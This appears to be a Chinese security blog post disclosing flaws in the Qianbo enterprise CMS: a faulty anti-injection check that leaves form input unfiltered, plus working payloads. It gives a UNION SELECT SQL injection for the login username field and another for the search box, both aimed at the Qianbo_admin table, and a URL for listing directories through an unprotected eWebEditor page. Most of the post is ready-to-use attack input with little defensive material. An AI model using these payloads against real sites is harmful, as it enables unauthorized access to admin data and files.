千博企业程序-一个防注入的小白错误
If EnableStopInjection = True Then If Request.QueryString <> "" Then Call StopInjection(Request.QueryString) If Request.Cookies <> "" Then Call StopInjection(Request.Cookies) If Request.Cookies <> "" Then Call StopInjection2(Request.Form) End If
========================
防注入开始还是Encode的,通过Echo他们的解码程序,才发现,这里面把cookie是否空判断两次。造成了Form的恶意字符提交。
漏洞证明:一个鸡肋的前台用户登陆Md5值是1,语句写在用户名里,密码写1
' UNION Select 1,1,1,'a0b923820dcc509a',1,1,1,1,1,1,1,1,1,1,1,1,1,1,true,1,1,1 FROM Qianbo_admin Where ''='
这个鸡肋的前台登陆只能到达MemberLogin.asp的48行
If UCase(LoginName) = UCase(MemName) And LoginPassword = Password
LoginName取的就是刚刚的那串语句,而查询结果的用户名是1所以卡在了这里
=================================================================
https://www.webshell.cc/system/ewebeditor/asp/browse.asp?action=FOLDER&style=coolblue&cusdir=dir&type=FILE
后台ewebeditor没有做权限的验证,可导致游客直接浏览
FCK也可列目录用本地的Test连上他们的Fck
===================================================================
搜索框中输入
%' and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from Qianbo_admin where '%'='
==================================================================
一堆鸡肋啊。。
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3327.html